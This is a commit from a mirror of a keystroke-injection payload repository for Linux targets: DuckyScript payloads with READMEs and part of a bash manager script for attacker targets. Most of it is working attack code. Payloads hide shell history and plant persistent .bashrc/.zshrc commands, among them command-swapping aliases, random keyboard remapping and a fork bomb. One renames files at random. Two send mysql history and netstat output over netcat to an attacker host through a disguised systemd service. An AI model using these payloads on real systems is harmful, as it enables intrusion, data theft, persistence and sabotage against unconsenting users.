mirror of https://github.com/hak5/omg-payloads.git
commit
b6916df78e
|
@ -0,0 +1,19 @@
|
||||||
|
## About
|
||||||
|
# Title: capslock_disable
|
||||||
|
# Description: capslock_disable disables capslock on target's system.
|
||||||
|
# AUTHOR: drapl0n
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Execution
|
||||||
|
# Target: GNU/Linux.
|
||||||
|
# Attackmodes: HID.
|
||||||
|
|
||||||
|
## capslock_disable: capslock_disable disables capslock on target's system. Can be used as module to craft payloads which requires long time to execute.
|
||||||
|
|
||||||
|
### Workflow:
|
||||||
|
1. Executing Terminal Emulator.
|
||||||
|
2. Prevent storing history.
|
||||||
|
3. Executing command which disables capslock.
|
||||||
|
4. Terminating terminal instance.
|
||||||
|
|
||||||
|
#### Support me if you like my work:
|
||||||
|
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,16 @@
|
||||||
|
REM Title: capslock_disable
|
||||||
|
REM Description: Disables capslock on target's system. Can be used as module to craft payloads which requires long time to execute.
|
||||||
|
REM AUTHOR: drapl0n
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Execution
|
||||||
|
REM Target: GNU/Linux.
|
||||||
|
REM Attackmodes: HID.
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
CTRL ALT t
|
||||||
|
DELAY 500
|
||||||
|
STRING unset HISTFILE
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING setxkbmap -option ctrl:nocaps && exit
|
||||||
|
ENTER
|
|
@ -0,0 +1,24 @@
|
||||||
|
## About:
|
||||||
|
# Title: browser_execOMG
|
||||||
|
# Description: browser_execOMG finds browser installed in target's system and searche URL in it.
|
||||||
|
# AUTHOR: drapl0n
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Execution.
|
||||||
|
# Target: Unix-like operating systems.
|
||||||
|
# Attackmodes: HID
|
||||||
|
|
||||||
|
## browser_execOMG: A payload which finds installed browser in target's system and searches URL in it. This payload can be used as a module to craft a new payload which requires browser execution in it.
|
||||||
|
|
||||||
|
### Workflow:
|
||||||
|
1. Executing Terminal Emulator.
|
||||||
|
2. Prevent storing history.
|
||||||
|
3. Storing script in target's system.
|
||||||
|
4. Granting execution privilege.
|
||||||
|
5. Executing script in background.
|
||||||
|
|
||||||
|
### Usage:
|
||||||
|
|
||||||
|
* Replace URL at line `15` in `payload.txt` with URL you want to search for.
|
||||||
|
|
||||||
|
#### Support me if you like my work:
|
||||||
|
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,22 @@
|
||||||
|
REM Title: browser_execOMG
|
||||||
|
REM Description: browser_execOMG finds browser installed in target's system and searche URL in it.
|
||||||
|
REM AUTHOR: drapl0n
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Execution.
|
||||||
|
REM Target: Unix-like operating systems.
|
||||||
|
REM Attackmodes: HID
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
CTRL ALT t
|
||||||
|
DELAY 500
|
||||||
|
STRING unset HISTFILE
|
||||||
|
ENTER
|
||||||
|
DELAY 100
|
||||||
|
STRING echo -e "url=hak5.org \n#\!/bin/bash\nfunction browser(){\n\tbrowser=\$(ls /bin/ | grep -Ew 'firefox|chromium|brave'| head -1)\n\tif [ \"\$browser\" = firefox ]; then\n\t\texecBrowser=\$(echo \$browser --private-window)\n\t\texport execBrowser\n\telif [ \"\$browser\" = chromium ]; then\n\t\texecBrowser=\$(echo \$browser --incognito)\n\t\texport execBrowser\n\telif [ \"\$browser\" = brave ]; then\n\t\texecBrowser=\$(echo \$browser --incognito)\n\t\texport execBrowser\n\telse\n\t\techo \"Browser not found.\"\n\tfi\n}\nbrowser\n\$execBrowser \$url " > /tmp/sys
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING chmod +x /tmp/sys
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING /tmp/./sys & disown && exit
|
||||||
|
ENTER
|
|
@ -0,0 +1,27 @@
|
||||||
|
## About:
|
||||||
|
* Title: keyboard_hangover
|
||||||
|
* Description: keyboard_hangover is a powerful oneliner payload which randomly remaps target's keyboard.
|
||||||
|
* AUTHOR: drapl0n
|
||||||
|
* Version: 1.0
|
||||||
|
* Category: Execution.
|
||||||
|
* Target: Unix-like operating systems.
|
||||||
|
* Attackmodes: HID.
|
||||||
|
|
||||||
|
## keyboard_hangover: keyboard_hangover is a powerful oneliner payload which randomly remaps target's keyboard and and auto-triggers it.
|
||||||
|
|
||||||
|
### Features:
|
||||||
|
1. Randomly remaps keyboard.
|
||||||
|
2. Auto-Triggers on shell execution.
|
||||||
|
3. Persistent payload.
|
||||||
|
4. Fast execution.
|
||||||
|
5. Oneliner.
|
||||||
|
|
||||||
|
### Workflow:
|
||||||
|
1. Prevent storing history.
|
||||||
|
2. Creating random string generation mechanism.
|
||||||
|
3. Creating loop to find files.
|
||||||
|
4. Granting executing privileges.
|
||||||
|
5. Executing Payload Script.
|
||||||
|
|
||||||
|
#### Support me if you like my work:
|
||||||
|
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,22 @@
|
||||||
|
REM Title: keyboard_hangover
|
||||||
|
REM Description: keyboard_hangover is a powerful payload which randomly remaps target's keyboard..
|
||||||
|
REM AUTHOR: drapl0n
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Execution.
|
||||||
|
REM Target: Unix-like operating systems.
|
||||||
|
REM Attackmodes: HID
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
CTRL ALT t
|
||||||
|
DELAY 500
|
||||||
|
STRING unset HISTFILE
|
||||||
|
ENTER
|
||||||
|
DELAY 100
|
||||||
|
STRING echo -e "#\!/bin/bash\n\nmapping_file=\"/var/tmp/system\"\n\nkeycodes=(\$(seq 8 255))\ncharacters=(\$(cat /dev/urandom | tr -dc 'a-zA-Z' | fold -w 1 | head -n \${#keycodes[@]}))\n\nmapping_content=""\nfor((i=0; i<\${#keycodes[@]}; i++)); do\n\tkeycode=\${keycodes[i]}\n\tchar=\${characters[i]}\n\tmapping_content+=\"keycode \$keycode = \$char\\\n\"\ndone\n\necho -e \$mapping_content > \$mapping_file\n\nls -a ~/ | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"xmodmap /var/tmp/system\" >> ~/.zshrc\nfi\nls -a ~/ | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"xmodmap /var/tmp/system\" >> ~/.bashrc\nfi" > /tmp/sys
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING chmod +x /tmp/sys
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING /tmp/./sys && rm /tmp/sys && exit
|
||||||
|
ENTER
|
|
@ -0,0 +1,24 @@
|
||||||
|
## About:
|
||||||
|
* Title: rename_entropy
|
||||||
|
* Description: rename_entropy is a powerful payload which renames target files along with extensions in home directory.
|
||||||
|
* AUTHOR: drapl0n
|
||||||
|
* Version: 1.0
|
||||||
|
* Category: Execution.
|
||||||
|
* Target: Unix-like operating systems.
|
||||||
|
* Attackmodes: HID.
|
||||||
|
|
||||||
|
## rename_entropy: rename_entropy is a powerful payload which renames target files along with extensions in home directory.
|
||||||
|
|
||||||
|
### Features:
|
||||||
|
1. Renames files and directories.
|
||||||
|
2. Fast paylaod execution.
|
||||||
|
3. Oneliner Payload.
|
||||||
|
|
||||||
|
### Workflow:
|
||||||
|
1. Prevent storing history.
|
||||||
|
2. Creating random string generation mechanism.
|
||||||
|
3. Granting executing privileges.
|
||||||
|
4. Executing Payload Script.
|
||||||
|
|
||||||
|
#### Support me if you like my work:
|
||||||
|
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,22 @@
|
||||||
|
REM Title: rename_entropy
|
||||||
|
REM Description: rename_entropy, rename_entropy is a powerful payload which renames target files with extensions.
|
||||||
|
REM AUTHOR: drapl0n
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Execution.
|
||||||
|
REM Target: GNU/Linux.
|
||||||
|
REM Attackmodes: HID.
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
CTRL ALT t
|
||||||
|
DELAY 500
|
||||||
|
STRING unset HISTFILE
|
||||||
|
ENTER
|
||||||
|
DELAY 100
|
||||||
|
STRING echo -e "#\!/bin/bash\ndir=\"/home/\$(whoami)/testdir/\"\ncd \"\$dir\" || exit\nfor file in *; do\n\trand_str=\$(cat /dev/urandom | tr -dc 'a-zA-Z' | fold -w 10 | head -n 1)\n\trand_ext=\$(cat /dev/urandom | tr -dc 'a-zA-Z' | fold -w 3 | head -n 1)\n\tmv \"\$file\" \"\${rand_str}.\${rand_ext}\"\ndone" > /tmp/sys
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING chmod +x /tmp/sys
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING /tmp/./sys && rm /tmp/sys && exit
|
||||||
|
ENTER
|
|
@ -0,0 +1,23 @@
|
||||||
|
## About:
|
||||||
|
# Title: SHELL_TRIGGER
|
||||||
|
# Description: SHELL_TRIGGER is an payload which triggers commands/scripts on shell execution on target's system OR triggers commands/scripts when target executes terminal emulator.
|
||||||
|
# AUTHOR: drapl0n
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Execution.
|
||||||
|
# Target: Unix-like operating systems.
|
||||||
|
# Attackmodes: HID
|
||||||
|
|
||||||
|
## SHELL_TRIGGER: SHELL_TRIGGER is payload which triggers commands/scripts on shell execution on target's system OR triggers commands/scripts when target executes terminal emulator.
|
||||||
|
|
||||||
|
### Workflow:
|
||||||
|
1. Executing Terminal Emulator.
|
||||||
|
2. Prevent storing history.
|
||||||
|
3. Storing script in target's system.
|
||||||
|
4. Granting execution privilege.
|
||||||
|
5. Executing script in background.
|
||||||
|
|
||||||
|
### Changes to be made:
|
||||||
|
* Replace command on line `15` in `payload.txt` with command/script you want your target to execute on shell execution.
|
||||||
|
|
||||||
|
#### Support me if you like my work:
|
||||||
|
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,25 @@
|
||||||
|
REM Title: shell_trigger
|
||||||
|
REM Description: shell_trigger is an payload which triggers commands/scripts on shell execution on target's system OR triggers commands/scripts when target executes terminal emulator.
|
||||||
|
REM AUTHOR: drapl0n
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Execution.
|
||||||
|
REM Target: Unix-like operating systems.
|
||||||
|
REM Attackmodes: HID
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
CTRL ALT t
|
||||||
|
DELAY 500
|
||||||
|
STRING unset HISTFILE
|
||||||
|
ENTER
|
||||||
|
DELAY 100
|
||||||
|
STRING cmd="echo hello world"
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING echo -e "ls -a ~/ | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"$cmd\" >> ~/.zshrc\nfi\n\nls -a ~/ | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"$cmd\" >> ~/.bashrc\nfi" >> /tmp/sys
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING chmod +x /tmp/sys
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING /tmp/./sys && rm /tmp/sys && exit
|
||||||
|
ENTER
|
|
@ -0,0 +1,25 @@
|
||||||
|
## About:
|
||||||
|
* Title: swap_jack
|
||||||
|
* Description: swap_jack, simple yet powerful payload which can be used to replace one command with another on target's system.
|
||||||
|
* AUTHOR: drapl0n
|
||||||
|
* Version: 1.0
|
||||||
|
* Category: Execution.
|
||||||
|
* Target: Unix-like operating systems.
|
||||||
|
* Attackmodes: HID, Storage.
|
||||||
|
|
||||||
|
## swap_jack: Simple yet Powerful payload which can be used to replace one command with another on target's system. swap_jack gives your target capability to trigger backdoors for you.
|
||||||
|
|
||||||
|
### Features:
|
||||||
|
1. Swap commands/Execute scripts covertly.
|
||||||
|
2. Persistent.
|
||||||
|
3. Can swap multiple commands.
|
||||||
|
4. Makes your target run commands/script for you.
|
||||||
|
|
||||||
|
### Usage:
|
||||||
|
* To swap custom commands make following changes at line `18` in `payload.sh`:
|
||||||
|
* Default swaped commands: `swap_array='alias ls=\"du\" \\n alias cd=\"dh\" \\n alias cat=\"lsblk\"'`.
|
||||||
|
* Example: Swapping `pwd` command with `find`:
|
||||||
|
* Add entry seperated by `\\n` to the line `18`: `swap_array='alias ls=\"du\" \\n alias cd=\"dh\" \\n alias cat=\"lsblk\"' \\n alias pwd=\"find\"`
|
||||||
|
|
||||||
|
#### Support me if you like my work:
|
||||||
|
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,28 @@
|
||||||
|
REM Title: swap_jack
|
||||||
|
REM Description: swap_jack, simple yet powerful payload which can be used to replace one command with another on target’s system.
|
||||||
|
REM AUTHOR: drapl0n
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Execution.
|
||||||
|
REM Target: GNU/Linux.
|
||||||
|
REM Attackmodes: HID.
|
||||||
|
|
||||||
|
DELAY 2000
|
||||||
|
CTRL ALT t
|
||||||
|
DELAY 1900
|
||||||
|
STRING unset HISTFILE
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING echo -e "#\!/bin/bash\n" > /tmp/sys
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING echo -e "swap_array='alias ls=\"du\" \\nalias cd=\"df\" \\nalias cat=\"lsblk\"'" >> /tmp/sys
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING echo -e "\n\n\ls -a ~/ | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"\$swap_array\" >> ~/.zshrc\nfi\n\nls -a ~/ | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"\$swap_array\" >> ~/.bashrc\nfi" >> /tmp/sys
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING chmod +x /tmp/sys
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING /tmp/./sys && rm /tmp/sys && exit
|
||||||
|
ENTER
|
|
@ -0,0 +1,43 @@
|
||||||
|
REM Title: termBomb
|
||||||
|
REM Description: termBomb prompts message "!!!!!!YOU HAVE BEEN HACKED!!!!!!" and executes fork bomb on launching shell/terminal.
|
||||||
|
REM Author: drapl0n
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Execution
|
||||||
|
REM Target: Unix-like operating systems.
|
||||||
|
REM Attackmode: HID
|
||||||
|
|
||||||
|
DELAY 400
|
||||||
|
CTRL-ALT t
|
||||||
|
DELAY 400
|
||||||
|
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
|
||||||
|
ENTER
|
||||||
|
STRING cat <<EOF > /tmp/tmppp
|
||||||
|
ENTER
|
||||||
|
STRING ls -a | grep 'zshrc' &> /dev/null
|
||||||
|
ENTER
|
||||||
|
STRING if [ 0 = 0 ]; then
|
||||||
|
ENTER
|
||||||
|
STRING echo -e "echo -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"" >> ~/.zshrc
|
||||||
|
ENTER
|
||||||
|
STRING echo ":(){ :|:& };:" >> ~/.zshrc
|
||||||
|
ENTER
|
||||||
|
STRING fi
|
||||||
|
ENTER
|
||||||
|
ENTER
|
||||||
|
STRING ls -a | grep 'bashrc' &> /dev/null
|
||||||
|
ENTER
|
||||||
|
STRING if [ 0 = 0 ]; then
|
||||||
|
ENTER
|
||||||
|
STRING echo -e "echo -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"" >> ~/.bashrc
|
||||||
|
ENTER
|
||||||
|
STRING echo ":(){ :|:& };:" >> ~/.bashrc
|
||||||
|
ENTER
|
||||||
|
STRING fi
|
||||||
|
ENTER
|
||||||
|
STRING EOF
|
||||||
|
ENTER
|
||||||
|
DELAY 300
|
||||||
|
STRING chmod +x /tmp/tmppp && /tmp/./tmppp && rm /tmp/tmppp
|
||||||
|
ENTER
|
||||||
|
STRING exit
|
||||||
|
ENTER
|
|
@ -0,0 +1,33 @@
|
||||||
|
## About:
|
||||||
|
* Title: mysql_dump
|
||||||
|
* Description: mysql_dump, a oneliner payload used to exfiltrate mysql history. Looting mysql history can be useful understanding targets database schema.
|
||||||
|
* AUTHOR: drapl0n
|
||||||
|
* Version: 1.0
|
||||||
|
* Category: Exfiltaration
|
||||||
|
* Target: Unix-like operating systems with systemd.
|
||||||
|
* Attackmodes: HID.
|
||||||
|
|
||||||
|
## mysql_dump: mysql_dump payload exfiltrates MySQL history, which can be used to understand targets database schema.
|
||||||
|
|
||||||
|
### Features:
|
||||||
|
* Exfiltrates mysql_history.
|
||||||
|
* Fully Persistent.
|
||||||
|
* Waits for target to get online.
|
||||||
|
* Transfers loot once target is online.
|
||||||
|
* Oneliner payload.
|
||||||
|
|
||||||
|
### Workflow:
|
||||||
|
1. Search if mysql_history file is present.
|
||||||
|
2. Creating Loot transfer mechanism in targets system.
|
||||||
|
3. Creating local systemd service for persistence.
|
||||||
|
4. Executing Autotart mechanism.
|
||||||
|
|
||||||
|
### Usage:
|
||||||
|
1. Run netcat listner on attacking machine: `nc -lvp <port number> > <output_filename>`
|
||||||
|
2. Example: `nc -lvp 4444 > mysql_history.txt
|
||||||
|
|
||||||
|
### Changes to be made:
|
||||||
|
* Replace IP address(twice) `0.0.0.0` and Port Number `4444` on line `15`.
|
||||||
|
|
||||||
|
#### Support me if you like my work:
|
||||||
|
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,22 @@
|
||||||
|
REM Title: mysql_dump
|
||||||
|
REM Description: mysql_dump, is a oneliner payload used to exfiltrate mysql history. Looting mysql history can be useful understanding targets database schema.
|
||||||
|
REM AUTHOR: drapl0n
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Exfiltaration.
|
||||||
|
REM Target: GNU/Linux.
|
||||||
|
REM Attackmodes: HID.
|
||||||
|
|
||||||
|
DELAY 2000
|
||||||
|
CTRL ALT t
|
||||||
|
DELAY 2000
|
||||||
|
STRING unset HISTFILE
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING echo -e "#\!/bin/bash\nls -a ~/ | grep -w '.mysql_history' &> /dev/null\nif [ \$? = 0 ]; then\n\tmkdir -p ~/.config/systemd/user\n\tmkdir -p /var/tmp/.system\n\tcp ~/.mysql_history /tmp/exfil\n\techo -e \"while :\\\ndo\\\n\\\tping -c 5 8.8.8.8\\\n\\\tif [ \\\$? -eq 0 ]; then\\\n\\\t\\\tnc -c 127.0.0.1 4444 < /tmp/exfil\\\n\\\tfi\\\ndone\" > /var/tmp/.system/systemBus\n\tchmod +x /var/tmp/.system/systemBus\n\techo -e \"[Unit]\\\nDescription= System BUS handler\\\n\\\n[Service]\\\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\\\nRestart=on-failure\\\nSuccessExitStatus=3 4\\\nRestartForceExitStatus=3 4\\\n\\\n[Install]\\\nWantedBy=default.target\" > ~/.config/systemd/user/systemBUS.service\n\tsystemctl --user enable --now systemBUS.service\n\tsystemctl --user start --now systemBUS.service\n\techo -e \"ls -a ~/ | grep 'zshrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \"systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\\\nfi\\\nls -a ~/ | grep 'bashrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \"systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\\\nfi\" > /tmp/tmmmp\n\tchmod +x /tmp/tmmmp && /tmp/./tmmmp && rm /tmp/tmmmp \nfi" > /tmp/system
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING chmod +x /tmp/system
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING /tmp/./system && rm /tmp/system && exit
|
||||||
|
ENTER
|
|
@ -0,0 +1,33 @@
|
||||||
|
## About:
|
||||||
|
* Title: network_surveillance
|
||||||
|
* Description: network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
|
||||||
|
* AUTHOR: drapl0n
|
||||||
|
* Version: 1.0
|
||||||
|
* Category: Exfiltaration
|
||||||
|
* Target: Unix-like operating systems with systemd.
|
||||||
|
* Attackmodes: HID.
|
||||||
|
|
||||||
|
## network_surveillance: network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
|
||||||
|
|
||||||
|
### Features:
|
||||||
|
* Exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
|
||||||
|
* Fully Persistent.
|
||||||
|
* Waits for target to get online.
|
||||||
|
* Transfers loot once target is online.
|
||||||
|
* Oneliner payload.
|
||||||
|
|
||||||
|
### Workflow:
|
||||||
|
1. Extracts network information.
|
||||||
|
2. Creating Loot transfer mechanism in targets system.
|
||||||
|
3. Creating local systemd service for persistence.
|
||||||
|
4. Executing Autotart mechanism.
|
||||||
|
|
||||||
|
### Usage:
|
||||||
|
1. Run netcat listner on attacking machine: `nc -lvp <port number> > <output_filename>`
|
||||||
|
2. Example: `nc -lvp 4444 > network_surveillance.txt
|
||||||
|
|
||||||
|
### Changes to be made:
|
||||||
|
* Replace IP address(twice) `0.0.0.0` and Port Number `4444` on line `15`.
|
||||||
|
|
||||||
|
#### Support me if you like my work:
|
||||||
|
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,22 @@
|
||||||
|
REM Title: network_surveillance
|
||||||
|
REM Description: network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
|
||||||
|
REM AUTHOR: drapl0n
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Exfiltration.
|
||||||
|
REM Target: GNU/Linux.
|
||||||
|
REM Attackmodes: HID.
|
||||||
|
|
||||||
|
DELAY 2000
|
||||||
|
CTRL ALT t
|
||||||
|
DELAY 1000
|
||||||
|
STRING unset HISTFILE
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING echo -e "#\!/bin/bash\nmkdir -p ~/.config/systemd/user\nmkdir -p /var/tmp/.system\nnetstat -antup >> /tmp/exfil\nnetstat -nlp >> /tmp/exfil\necho -e \"while :\\\ndo\\\n\\\tping -c 5 127.0.0.1\\\n\\\tif [ \\\$? -eq 0 ]; then\\\n\\\t\\\tnc -c 127.0.0.1 4444 < /tmp/exfil\\\n\\\tfi\\\ndone\" > /var/tmp/.system/systemBus\nchmod +x /var/tmp/.system/systemBus\necho -e \"[Unit]\\\nDescription= System BUS handler\\\n\\\n[Service]\\\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\\\nRestart=on-failure\\\nSuccessExitStatus=3 4\\\nRestartForceExitStatus=3 4\\\n\\\n[Install]\\\nWantedBy=default.target\" > ~/.config/systemd/user/systemBUS.service\nsystemctl --user enable --now systemBUS.service\nsystemctl --user start --now systemBUS.service\necho -e \"ls -a ~/ | grep 'zshrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \"systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\\\nfi\\\nls -a ~/ | grep 'bashrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \"systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\\\nfi\" > /tmp/tmmmp\nchmod +x /tmp/tmmmp && /tmp/./tmmmp && rm /tmp/tmmmp" > /tmp/system
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING chmod +x /tmp/system
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING /tmp/./system && rm /tmp/system && exit
|
||||||
|
ENTER
|
|
@ -0,0 +1,135 @@
|
||||||
|
#!/bin/bash
|
||||||
|
allowAbort=true;
|
||||||
|
myInterruptHandler()
|
||||||
|
{
|
||||||
|
if $allowAbort; then
|
||||||
|
echo
|
||||||
|
echo -e "\n\033[1mYou terminated OMGNetManager...\033[0m" && exit 1;
|
||||||
|
fi;
|
||||||
|
}
|
||||||
|
trap myInterruptHandler SIGINT;
|
||||||
|
echo -e "\033[4m\033[1mWelcome to OMGNet Manager!!!\033[0m"
|
||||||
|
echo
|
||||||
|
echo -e "1] Connect with target.\n2] Create new target.\n3] List available target.\n4] Remove target.\n5] Update target."
|
||||||
|
echo
|
||||||
|
read -p "Enter your choice: " ch
|
||||||
|
create () {
|
||||||
|
read -p "Enter Target's name(without whitespaces): " name
|
||||||
|
if [[ $(grep -oh "\w*$name\w*" ~/.config/OMGNet/OMGNet.db) == $name ]]; then
|
||||||
|
echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0mName \"$name\" already exists."
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
read -p "Enter Servers IP: " ip
|
||||||
|
read -p "Enter Unique Port Number(1500-65535): " port
|
||||||
|
if [[ $(grep -oh "\w*$ip\w*" ~/.config/OMGNet/OMGNet.db) == $ip ]] && [[ $(grep -oh "\w*$port\w*" ~/.config/OMGNet/OMGNet.db) == $port ]]; then
|
||||||
|
echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0mTarget exist with similar IP address \"$ip\" and port number \"$port\"."
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
max=65535
|
||||||
|
min=1500
|
||||||
|
read -p "Specify directory for output: " dir
|
||||||
|
if [ ! -d "$dir" ]; then
|
||||||
|
echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0m\"$dir\" no such directory."
|
||||||
|
exit 1
|
||||||
|
else
|
||||||
|
cp -r ~/.config/OMGNet/payload $dir
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [[ $ip =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && (( $port <= $max )) && (( $port >= $min )); then
|
||||||
|
sed -i -e "s/0.0.0.0/$ip/g" $dir/payload
|
||||||
|
sed -i -e "s/4444/$port/g" $dir/payload
|
||||||
|
echo -e "$(echo "$name"|xargs)\t$ip\t$port" >> ~/.config/OMGNet/OMGNet.db
|
||||||
|
read -p "Do you want payload encoded(y|n): " enc
|
||||||
|
else
|
||||||
|
echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0mInvalid IP address \"$ip\" or Port number \"$port\"."
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
}
|
||||||
|
list () {
|
||||||
|
|
||||||
|
column -t -o ' ' ~/.config/OMGNet/OMGNet.db | awk '{print NR" - "$0}'
|
||||||
|
}
|
||||||
|
remove () {
|
||||||
|
echo
|
||||||
|
list
|
||||||
|
echo
|
||||||
|
read -p "Enter name of target to remove: " rmv
|
||||||
|
if grep -q $rmv ~/.config/OMGNet/OMGNet.db; then
|
||||||
|
sed -i "/\b\($rmv\)\b/d" ~/.config/OMGNet/OMGNet.db
|
||||||
|
echo -e "\033[0;32m\e[1mOMGNetManager:Success:\e[0mRemoved \"$rmv\"."
|
||||||
|
else
|
||||||
|
echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0m\"$rmv\" no such target found."
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
update () {
|
||||||
|
echo
|
||||||
|
list
|
||||||
|
echo
|
||||||
|
read -p "Choose target number: " cho
|
||||||
|
read -p "You want to update (ip|port): " ent
|
||||||
|
if [ "$ent" = ip ]
|
||||||
|
then
|
||||||
|
one=$(sed ""$cho\!d"" ~/.config/OMGNet/OMGNet.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
|
||||||
|
read -p "Enter new ip: " use
|
||||||
|
if [[ $use =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
|
||||||
|
sed -i -e "$cho s/$one/$use/g" ~/.config/OMGNet/OMGNet.db
|
||||||
|
echo -e "\033[0;32m\e[1mOMGNetManager:Success:\e[0mUpdated IP."
|
||||||
|
else
|
||||||
|
echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0mInvalid IP address \"$use\"."
|
||||||
|
exit
|
||||||
|
fi
|
||||||
|
elif [ "$ent" = port ]
|
||||||
|
then
|
||||||
|
two=$(sed ""$cho\!d"" ~/.config/OMGNet/OMGNet.db | awk '{print $ 3}')
|
||||||
|
read -p "Enter new Port number: " useP
|
||||||
|
max=65535
|
||||||
|
min=1500
|
||||||
|
if (( $useP <= $max )) && (( $useP >= $min )); then
|
||||||
|
sed -i -e "$cho s/$two/$useP/g" ~/.config/OMGNet/OMGNet.db
|
||||||
|
echo -e "\033[0;32m\e[1mOMGNetManager:Success:\e[0mUpdated Port number\"$ent\"."
|
||||||
|
else
|
